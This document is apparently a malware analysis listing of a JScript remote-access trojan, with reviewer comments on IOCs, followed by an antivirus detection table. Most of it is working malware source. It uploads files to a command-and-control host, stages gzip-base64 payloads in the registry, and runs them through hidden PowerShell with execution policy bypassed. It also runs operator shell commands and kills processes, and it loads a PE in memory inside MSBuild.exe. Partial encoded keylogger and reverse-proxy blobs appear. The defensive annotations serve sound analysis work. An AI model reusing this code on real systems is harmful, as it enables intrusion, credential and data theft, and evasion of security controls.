function upload (fileurl, retcmd){
var httpobj,objstreamuploade,buffer;
var objstreamuploade = WScript.CreateObject("adodb.stream");
objstreamuploade.Type = 1;
objstreamuploade.Open();
objstreamuploade.loadFromFile(fileurl);
buffer = objstreamuploade.Read();
objstreamuploade.close();
objstreamdownload = null;
var httpobj = WScript.CreateObject("msxml2.xmlhttp");
httpobj.open("post","http://" + host + ":" + port +"/" + retcmd, false);
httpobj.setRequestHeader("user-agent:", information());
httpobj.send(buffer);
}catch(er){
updatestatus("Upload+Failed");
function faceMask(compressed64){
var pwshl="powershell -ExecutionPolicy Bypass -windowstyle hidden -Command ";
var aRInyPRio="HKCU\\SOFTWARE\\Microsoft\\test";
shellobj.regwrite(aRInyPRio,compressed64,"REG_SZ");
shellobj.Run(pwshl+String.fromCharCode(34)+"$Cli444 = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"+String.fromCharCode(34),0,false);
return loopTill(compressed64);
// Waits for the PowerShell decompression stage started by faceMask() to
// rewrite HKCU\SOFTWARE\Microsoft\test. `interval` is the value that was
// written before PowerShell ran (the still-compressed blob); the loop polls
// once per second until the value differs, deletes the value to clean up,
// and returns the new (decompressed, base64) content.
// NOTE(review): there is no timeout. If PowerShell is blocked (AppLocker,
// AMSI, missing binary) the value never changes and the script hangs here
// forever -- a cheap containment lever, and a useful behavioural tell.
function loopTill(interval){
var data = shellobj.regread("HKCU\\SOFTWARE\\Microsoft\\test");
while(data == interval){
WScript.sleep(1000);
data = shellobj.regread("HKCU\\SOFTWARE\\Microsoft\\test");
// The staging value is removed after use, so it is only observable on disk
// during the decompression window; registry-write telemetry is needed to catch it.
shellobj.regdelete("HKCU\\SOFTWARE\\Microsoft\\test");
return data;
// C2 "delete file or folder" handler. Attempts both deleteFile and
// deleteFolder on the same path; whichever call does not apply to the path's
// type throws, and the error is swallowed by the catch. `url` comes from the
// operator and is not validated in any way.
// The listing as extracted shows the catch without its try opener.
function deletefaf (url){
filesystemobj.deleteFile(url);
filesystemobj.deleteFolder(url);
}catch(err){}
// Remote command execution. Runs the operator-supplied string through
// %comspec% /c (so pipes, redirects and built-ins all work) with stdout
// redirected to <installdir>\out.txt, waits for it to finish (third arg true),
// reads the captured output back and deletes the temp file.
// Forensic artefact: a transient out.txt in the install directory; if the
// deleteFile below fails the file is left behind with the command output.
// stderr is not redirected, so errors from the command are not captured.
// The listing as extracted shows the catch without its try opener.
function cmdshell (cmd){
var httpobj,oexec,readallfromany;
var strsaveto = installdir + "out.txt";
// Window style 0 = hidden. `cmd` is interpolated unquoted: full shell injection by design.
shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
// NOTE(review): the TextStream returned by openTextFile is never closed
// explicitly; if its handle is still open the deleteFile can fail, and that
// failure is swallowed by the catch (output would still be returned).
readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
filesystemobj.deleteFile(strsaveto);
}catch(ee){}
return readallfromany;
// Process listing for the C2 "process manager" view. Queries WMI
// (root\cimv2, Win32_Process) and serialises one record per process as
//   <name>^<pid>^<executablePath><spliter>
// so the server can split on spliter and then on "^".
// The flags argument 48 presumably is wbemFlagReturnImmediately (0x10) |
// wbemFlagForwardOnly (0x20) -- a semi-synchronous, forward-only enumeration.
// The second ExecQuery argument (query language) is passed as null here.
// The listing as extracted shows the catch without its try opener.
function enumprocess(){
var ep = "";
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_process",null,48);
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
ep = ep + objitem.name + "^";
ep = ep + objitem.processId + "^";
// executablePath can be null for system/protected processes; it is then
// concatenated as the string "null" rather than skipped.
ep = ep + objitem.executablePath + spliter;
}catch(er){}
return ep;
// Kills a process by PID on operator request. taskkill /F forces termination
// and /T also kills the process tree. `pid` is taken from the C2 command and
// spliced into the command line unvalidated. Run with a hidden window, waiting
// for completion. Failures are swallowed.
// The listing as extracted shows the catch without its try opener.
function exitprocess (pid){
shellobj.run("taskkill /F /T /PID " + pid,0,true);
}catch(err){}
// Returns the parent folder name of the file at `path`.
// NOTE(review): getParentFolderName expects a path string but is given the
// File object; this presumably works through the object's default (Path)
// property. getFile throws if `path` does not exist or is a folder.
function getParentDirectory(path){
var fo = filesystemobj.getFile(path);
return filesystemobj.getParentFolderName(fo);
function enumfaf (enumdir){
var re = "";
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).subfolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
re = re + folder.name + "^^d^" + folder.attributes + spliter;
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
}catch(err){}
return re;
// Embedded keylogger module. The literal is base64 of a gzip stream (the
// "H4sI" prefix is the base64 encoding of the gzip magic 1f 8b 08) and is
// unpacked through the registry/PowerShell stage in faceMask(), which returns
// the decompressed bytes as base64. The blob is truncated in this listing, so
// the module itself cannot be recovered from here.
function getKeyLogger(){
var encoded = "H4sIAAAAAAAEAO18C3gc1ZFu9WN6HpJGmhlZlrFsDzY2YyQL+YVtsEGyJEvCkiWkkY3BII9m2tLg0bQ8M7KlmIAIIRsSZ4k3T8jjQpybhOzdAAlZSEKCA2w27OZBshvyIoQ8bgjJ7ia5IcmS7DX3r+qelySDc/Pt3e9+X9qe6lN1qurUqVOnzjndM+q75q2kEZGOz8svEz1M9tVKr37N4uNf8Wk/Pej98vkPK71fPj86nsyGJzPWWCY2EY7H0mkrFx41w5mpdDiZDnf0D4UnrITZXFXlu8DRMdBJ1KvodP2/fv1AXu9zpCoVSgXRIJAam/axIwBhp1G2jsuqbTdR8Q7hAqJS622iQHTUFHTVlPQhCr37uHA30bhvgU6eJqp0OttwDj4pXLDPU4J6gHeX4M05czqH+4NXOf0aLO1EQcXB5mwilosRvcexgftMe8v5WmFlcyabiZPTB/RFjL56Hl9rc8ZMWXGnT6cdfYl5fDvPrZN/vv5/v956xL5zbKrkoic2g3YZSU64lMjwbS7mhHO51qgRhQhBeBH/VyMuB/l61o3SLOr0rIdLPHezXi5pXPJxSedSBZdcPBmggkItisxXCAboJha3ELo+XyMZF+XrVKljhVbV3DpN6rgJyz+3Tpc6btSqnlvnkjo2w6rJ1y1t0SkEEwyuU0+gtLQpWE1n6rhk1YJtnVbXqCwO6QF920+g5CZw6rVnlLozSsgVcDVtFMJTzB5ZBHarDiBkBIymugyIk3VvWYWeRhaDmq0HeA01VlB2CTuEBWmOeK11nniXPd7oe/a1z2amwpBfvU5fU9dYt7oygoTl81jLmFWMqDujnQmsyWB4JxdLU1XeOrveWg7wAfJK2xVum5hdwTZEoNP37OK5jVvnc9vPUKOLVF+jAveQ0sDjdIJ8n6Yt75RxOUHmr2gxD1+oRSWoIzf7TjtTp7LLVrIKLUhnFjFq3MIQo85xs8qJG5YLkuRS+FyLYN3wRVbnR8SOD85lXqmPrJk7j
return faceMask(encoded);
// Embedded configuration blob, returned as a raw byte array. Unlike the
// faceMask()-wrapped modules this one is plain base64 (no gzip stage): it is
// decoded in-process via an MSXML DOM element with dataType "bin.base64",
// whose nodeTypedValue yields the decoded bytes. The blob content is
// redacted in this listing.
function getConfig(){
var encoded = "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
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
// Embedded VNC module (name suggests UltraVNC; confirm from the decoded
// binary). Base64+gzip, unpacked via the faceMask() PowerShell stage.
// The blob is redacted in this listing.
function getUVNC(){
var encoded = "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
return faceMask(encoded);
// Embedded RDP-related module (exact purpose not recoverable from the name
// alone -- confirm from the decoded binary). Base64+gzip, unpacked via the
// faceMask() PowerShell stage. The blob is redacted in this listing.
function getRDP(){
var encoded = "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
return faceMask(encoded);
// Embedded reverse-proxy module, base64 of a gzip stream ("H4sI" = gzip
// magic), unpacked via the faceMask() PowerShell stage. Truncated in this
// listing, so the module cannot be recovered from here.
function getReverseProxy(){
var encoded = "H4sIAAAAAAAEAO17C3QcV5nmX4/u6ofUUnfbLQlbSVt+RI4elmw5lhw7kSy/FD8jyY8wZuVWd0nquNWlVHXbVkIS+YSHszgZ5zAw4CxMMJkZwhA2swsbAgw4wBmYDGHDbCY7OQQTGJiQ3Z3DJrs7hwyMs99/b1U/JBnCDHvm7DmpVv91/8f973//+9//3ltd2vfO86QRkY7vm28SfYHk1U+//prDN3LtFyP0ueCzK76g7H12xehU1knO2NaknZpOplP5vFVIjptJu5hPZvPJ7QdGktNWxuysrQ2tcnUc3EG0V9Ep8oNb3uXpfZlUJayEiXqA1EvaZ4cBkvged63jsirtJirf6VIZUan/vUKB0FFf0lVf0Yfj0LvH7cynQot08hGiGpLtLn8LPildsC9QgQaA767AOwvm6QLun1vv9qunshMlFcc7nUyqkCJ61LWB+0y91XL96HWn7dhpcvuAvgijNy+Q6++0zZyVdvv0iKtv5wK5bW+tk29f/79f54flnWNTJR/9dB3R6RYSOeEdRP6DyXJOeCvX5/D9zjM/+4qC+0P45kZmnYI53TlsOlbRTptOqTRspjKm3Z6cdtKWncuOtycPm7aTtfJb13d28ac9OVjMFYq2uTVvFgt2KteePFgcz2XTe8zZUeuEmd86vmlTamN64w3dfRt6zK7evpULGyvmC9lp0yOMmAW1wtiDA9v5j21eo7bCZEye6/lPbfW5yF85Bkpz4OlOgEucc5wglzQuhbikcynMJR9PYqigeJci8gwqRukerm5hyoVCbeS/3uOpgscKrdr5PE3wuAkrMp+nCx43atXN5/kEj82w6j3esi6d4jDBzzz1HErL2mN1dCXBJWsJxDq0RJvSENejet/fQck9kNSXXFESV5S4L+pr3yAIz7F461KIWwmAuD/qb0/YIM4kHliGnrY2gOo0AtxJbWFymtghXJHmVV9ivUN4lz3eFrp892W7iFrK6g59TaItsbqmFYk2FLCaWVQYkbiiX
return faceMask(encoded);
// Embedded "hidden browser" module (name-based guess; confirm from the
// decoded binary). Base64+gzip, unpacked via the faceMask() stage.
// Obfuscation note: the callee name on the return line is spelled with
// \u escapes -- \u0066\u0061\u0063\u0065\u004d\u0061\u0073\u006b decodes to
// "faceMask" -- so a plain-text grep for faceMask( misses this call site.
// The blob is redacted in this listing.
function getHbrowser(){
var encoded = "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
return \u0066\u0061\u0063\u0065\u004d\u0061\u0073\u006b(encoded);
// Embedded mail-credential/recovery module (name-based guess; confirm from
// the decoded binary). Plain base64, decoded in-process to a byte array via
// MSXML dataType "bin.base64" -- no PowerShell stage, unlike the faceMask()
// modules. The blob is redacted in this listing.
function getMailRec(){
var encoded = "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
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
// In-memory execution of a PE payload via PowerShell reflection.
// Two values are staged under HKCU\SOFTWARE\Microsoft:
//   mPluginC - the payload (base64), as supplied by the caller
//   mRunPE   - a .NET loader assembly (base64), unpacked here via faceMask()
// A hidden PowerShell (-ExecutionPolicy Bypass) then reads both,
// Assembly.Load()s the loader and invokes k.k.Hackitup.exe with
// ('MSBuild.exe', <payload bytes>, args). The value name and the MSBuild.exe
// argument strongly suggest a RunPE / process-hollowing loader that runs the
// payload inside a spawned MSBuild.exe -- TODO confirm by analysing the
// decoded mRunPE assembly before documenting it as fact.
// IOCs: registry values mPluginC and mRunPE under HKCU\SOFTWARE\Microsoft;
// PowerShell command line containing [System.Reflection.Assembly]::Load and
// 'k.k.Hackitup'; wscript.exe -> powershell.exe -> MSBuild.exe process chain.
// NOTE(review): `args` is spliced into a single-quoted PowerShell string, so a
// quote in args breaks (or rewrites) the command; the staged values are never
// deleted afterwards, unlike the "test" value used by faceMask().
function payloadLuncher(payload64, args){
var pwshl="powershell -ExecutionPolicy Bypass -windowstyle hidden -Command ";
var mRunPeCode = faceMask("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
var aRInyPRio="HKCU\\SOFTWARE\\Microsoft\\mPluginC";
var aRInyPRio2="HKCU\\SOFTWARE\\Microsoft\\mRunPE";
shellobj.regwrite(aRInyPRio,payload64,"REG_SZ");
shellobj.regwrite(aRInyPRio2,mRunPeCode,"REG_SZ");
shellobj.Run(pwshl+String.fromCharCode(34)+"$Cli444 = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'"+args+"'));"+String.fromCharCode(34),0,false);
// Base64-encodes a byte array using the MSXML DOM trick: assigning the bytes
// to nodeTypedValue of an element with dataType "bin.base64" makes the
// element's .text the base64 string. This is the inverse of the
// bin.base64 decoding used by the get*() blob helpers.
function Base64Encode(byteArray){
var oNode = WScript.CreateObject("microsoft.xmldom").createElement("mkt");
oNode.dataType = "bin.base64";
oNode.nodeTypedValue = byteArray;
return oNode.text;
// Optional "binder" (bundled secondary executable). "[binder]" is a builder
// placeholder: a generated sample has it replaced by a base64 PE, while this
// sample still carries the literal placeholder, so the function returns null
// and runBinder() is never reached from the caller's null check.
// When populated, the base64 is decoded to a byte array via MSXML bin.base64.
function getBinder(){
var encoded = "[binder]";
if(encoded != "[binder]"){
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}else{
return null;
// Drops and runs the bundled binder executable. Writes getBinder()'s bytes
// to <installdir>\ibnder.exe (note the "ibnder" misspelling -- a stable
// filename IOC), replacing any existing copy, then launches it with the
// default (visible) window style. No integrity or signature check on the
// dropped bytes.
// The listing as extracted shows the catch without its try opener.
function runBinder(){
var strsaveto = installdir + "ibnder.exe";
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
var objstreamdownload = WScript.CreateObject("adodb.stream");
// Type = 1: binary stream, so the PE is written byte-for-byte.
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getBinder());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
// Executed even after the catch above: if a (possibly stale or partially
// written) ibnder.exe exists it is still launched.
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\"");
Antivirus Signature
Bkav Clean
DrWeb PowerShell.Packed.25
MicroWorld-eScan JS:Trojan.Cryxos.3662
FireEye JS:Trojan.Cryxos.3662
CAT-QuickHeal VBS.Agent.34768
McAfee VBS/Autorun.worm.aaha
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-JS.Save.b6586d32
K7AntiVirus Clean
K7GW Clean
Arcabit JS:Trojan.Cryxos.DE4E
BitDefenderTheta Clean
Cyren JS/Agent.AGG4!Eldorado
Symantec Trojan.Gen.NPE
ESET-NOD32 JS/Vjworm.CD
TrendMicro-HouseCall Clean
Avast JS:ADODB-BL [Expl]
ClamAV Txt.Packed.Cryxos-7111887-0
Kaspersky Trojan.Script.Agent.br
BitDefender JS:Trojan.Cryxos.3662
NANO-Antivirus Trojan.Script.Dropper.foxxbq
ViRobot Clean
SUPERAntiSpyware Clean
Rising Backdoor.Houdini/JS!1.C2BA (CLASSIC)
Ad-Aware JS:Trojan.Cryxos.3662
Sophos Clean
Comodo Worm.JS.Vjworm.AK@8cyo73
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro HEUR_JSRANSOM.O4
McAfee-GW-Edition BehavesLike.VBS.Dropper.cj
CMC Clean
Emsisoft JS:Trojan.Cryxos.3662 (B)
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Trojan:VBS/Irsaz.B
AegisLab Clean
AhnLab-V3 Backdoor/JS.Agent.S1250
ZoneAlarm Clean
GData JS:Trojan.Cryxos.3662
Cynet Clean
TotalDefense Clean
VBA32 Clean
MAX malware (ai score=88)
Zoner Clean
Tencent Heur:Trojan.Script.LS_Gencirc.7223621.0
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet JS/Agent.BM!tr
AVG JS:ADODB-BL [Expl]
Panda Clean
Qihoo-360 Clean
No IRMA results available.